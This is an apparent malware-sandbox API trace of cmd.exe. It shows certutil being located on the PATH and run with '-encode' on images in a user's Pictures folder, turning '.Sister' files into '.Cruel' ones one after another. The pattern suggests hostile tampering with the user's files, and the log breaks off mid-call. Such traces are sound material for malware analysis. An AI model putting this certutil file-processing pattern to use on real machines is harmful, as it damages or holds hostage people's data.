_wcsicmp (_String1="certutil", _String2="CD") returned 1 [0298.352] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0298.352] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0298.352] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0298.352] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0298.352] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0298.352] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0298.352] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0298.352] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0298.352] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0298.353] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0298.353] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0298.353] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0298.353] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0298.353] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0298.353] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0298.353] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0298.353] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0298.353] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0298.353] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0298.353] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0298.353] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0298.353] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0298.353] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0298.353] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0298.353] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0298.353] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0298.353] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0298.353] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0298.353] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0298.353] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0298.353] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0298.353] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0298.353] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0298.353] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0298.353] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0298.353] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0298.353] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0298.354] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0298.354] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0298.354] ??_V@YAXPEAX@Z () returned 0x1 [0298.354] GetProcessHeap () returned 0x21ed8c70000 [0298.354] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cc97c0 [0298.354] GetProcessHeap () returned 0x21ed8c70000 [0298.354] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8e) returned 0x21ed8d45120 [0298.354] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0298.354] malloc (_Size=0xffce) returned 0x21eda100000 [0298.354] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0298.354] GetProcessHeap () returned 0x21ed8c70000 [0298.354] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8cd97b0 [0298.356] SetErrorMode (uMode=0x0) returned 0x0 [0298.356] SetErrorMode (uMode=0x1) returned 0x0 [0298.356] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8cd97c0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0298.356] SetErrorMode (uMode=0x0) returned 0x1 [0298.356] GetProcessHeap () returned 0x21ed8c70000 [0298.356] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cd97b0, Size=0x54) returned 0x21ed8cd97b0 [0298.356] GetProcessHeap () returned 0x21ed8c70000 [0298.356] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cd97b0) returned 0x54 [0298.356] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0298.356] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0298.356] GetProcessHeap () returned 0x21ed8c70000 [0298.356] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed8d65fb0 [0298.356] GetProcessHeap () returned 0x21ed8c70000 [0298.356] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d43b70 [0298.357] GetProcessHeap () returned 0x21ed8c70000 [0298.357] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d43b70, Size=0x1c0) returned 0x21ed8d66180 [0298.357] GetProcessHeap () returned 0x21ed8c70000 [0298.357] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66180) returned 0x1c0 [0298.357] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0298.357] GetProcessHeap () returned 0x21ed8c70000 [0298.357] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d6ae90 [0298.357] GetProcessHeap () returned 0x21ed8c70000 [0298.357] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6ae90, Size=0x7e) returned 0x21ed8d6ae90 [0298.357] GetProcessHeap () returned 0x21ed8c70000 [0298.357] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6ae90) returned 0x7e [0298.357] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0298.357] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0298.358] GetLastError () returned 0x2 [0298.358] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0298.358] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0298.358] GetLastError () returned 0x2 [0298.358] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0298.358] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0298.358] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0298.359] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0298.359] GetLastError () returned 0x2 [0298.359] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0298.359] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0298.359] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0298.359] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0298.359] ??_V@YAXPEAX@Z () returned 0x1 [0298.359] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0298.361] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0298.361] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0298.361] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0298.361] GetProcessHeap () returned 0x21ed8c70000 [0298.361] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45da0 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0298.361] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0298.362] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0298.362] GetProcessHeap () returned 0x21ed8c70000 [0298.362] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45da0) returned 1 [0298.362] GetProcessHeap () returned 0x21ed8c70000 [0298.363] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95580 [0298.363] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0298.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.363] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0298.363] _get_osfhandle (_FileHandle=0) returned 0x4c [0298.363] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0298.364] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"Gq9O pR9E.bmp.Sister\" \"Gq9O pR9E.bmp.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"Gq9O pR9E.bmp.Sister\" \"Gq9O pR9E.bmp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"Gq9O pR9E.bmp.Sister\" \"Gq9O pR9E.bmp.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x13c8, dwThreadId=0x13cc)) returned 1 [0298.375] CloseHandle (hObject=0xa8) returned 1 [0298.376] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0298.376] GetProcessHeap () returned 0x21ed8c70000 [0298.376] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0298.376] GetEnvironmentStringsW () returned 0x21ed8cc7010* [0298.376] GetProcessHeap () returned 0x21ed8c70000 [0298.376] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d603e0 [0298.376] FreeEnvironmentStringsA (penv="=") returned 1 [0298.376] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0298.885] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0298.885] CloseHandle (hObject=0xa4) returned 1 [0298.886] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0298.886] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0298.886] GetProcessHeap () returned 0x21ed8c70000 [0298.886] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0298.886] GetEnvironmentStringsW () returned 0x21ed8cc7010* [0298.886] GetProcessHeap () returned 0x21ed8c70000 [0298.886] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d603e0 [0298.886] FreeEnvironmentStringsA (penv="=") returned 1 [0298.886] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0298.886] GetProcessHeap () returned 0x21ed8c70000 [0298.886] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0298.886] GetEnvironmentStringsW () returned 0x21ed8cc7010* [0298.887] GetProcessHeap () returned 0x21ed8c70000 [0298.887] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d603e0 [0298.887] FreeEnvironmentStringsA (penv="=") returned 1 [0298.887] GetProcessHeap () returned 0x21ed8c70000 [0298.887] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95580) returned 1 [0298.887] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0298.887] ??_V@YAXPEAX@Z () returned 0x1 [0298.887] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ccb9550, ftCreationTime.dwHighDateTime=0x1d5e61d, ftLastAccessTime.dwLowDateTime=0x90942140, ftLastAccessTime.dwHighDateTime=0x1d5e4b8, ftLastWriteTime.dwLowDateTime=0x90942140, ftLastWriteTime.dwHighDateTime=0x1d5e4b8, nFileSizeHigh=0x0, nFileSizeLow=0x6a01, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="hx6X83DtmMlRtgH7hUE7.jpg.Sister", cAlternateFileName="")) returned 1 [0298.887] GetProcessHeap () returned 0x21ed8c70000 [0298.887] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95c40, Size=0x1a6) returned 0x21ed8c95c40 [0298.887] GetProcessHeap () returned 0x21ed8c70000 [0298.887] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95c40) returned 0x1a6 [0298.887] GetProcessHeap () returned 0x21ed8c70000 [0298.887] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0370 [0298.887] GetProcessHeap () returned 0x21ed8c70000 [0298.887] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0370, Size=0x58) returned 0x21ed93b0370 [0298.887] GetProcessHeap () returned 0x21ed8c70000 [0298.887] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0370) returned 0x58 [0298.887] GetProcessHeap () returned 0x21ed8c70000 [0298.887] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b03e0 [0298.888] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0298.888] GetProcessHeap () returned 0x21ed8c70000 [0298.888] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x50) returned 0x21ed8c7cc40 [0298.888] ??_V@YAXPEAX@Z () returned 0x1 [0298.888] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0298.888] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cca0 [0298.888] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0298.888] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cca0 [0298.889] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0298.889] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdcb24a19, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdcb24a19, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7cca0 [0298.889] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0298.889] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\hx6X83DtmMlRtgH7hUE7.jpg.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ccb9550, ftCreationTime.dwHighDateTime=0x1d5e61d, ftLastAccessTime.dwLowDateTime=0x90942140, ftLastAccessTime.dwHighDateTime=0x1d5e4b8, ftLastWriteTime.dwLowDateTime=0x90942140, ftLastWriteTime.dwHighDateTime=0x1d5e4b8, nFileSizeHigh=0x0, nFileSizeLow=0x6a01, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="hx6X83DtmMlRtgH7hUE7.jpg.Sister", cAlternateFileName="HX6X83~1.SIS")) returned 0x21ed8c7cf40 [0298.889] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0298.889] _wcsnicmp (_String1="HX6X83~1.SIS", _String2="hx6X83DtmMlRtgH7hUE7.jpg.Sister", _MaxCount=0x1f) returned 26 [0298.889] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0298.890] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0298.890] GetProcessHeap () returned 0x21ed8c70000 [0298.890] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bd50 [0298.890] ??_V@YAXPEAX@Z () returned 0x1 [0298.890] ??_V@YAXPEAX@Z () returned 0x1 [0298.890] GetProcessHeap () returned 0x21ed8c70000 [0298.890] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b03e0, Size=0x270) returned 0x21ed93b03e0 [0298.890] GetProcessHeap () returned 0x21ed8c70000 [0298.890] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b03e0) returned 0x270 [0298.890] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0298.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.890] GetFileType (hFile=0x50) returned 0x2 [0298.890] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.890] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0298.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.891] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0298.898] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0298.898] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0298.898] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0298.898] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0298.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.898] GetFileType (hFile=0x50) returned 0x2 [0298.898] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.898] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0298.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.898] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0298.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.899] GetFileType (hFile=0x50) returned 0x2 [0298.899] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.899] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0298.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.899] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93b0380*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed93b0380*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0298.900] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"hx6X83DtmMlRtgH7hUE7.jpg.Sister\" \"hx6X83DtmMlRtgH7hUE7.jpg.Cruel\" ") returned 76 [0298.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.900] GetFileType (hFile=0x50) returned 0x2 [0298.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.900] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0298.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0298.900] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x4c, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x4c) returned 1 [0298.901] _vsnwprintf (in: 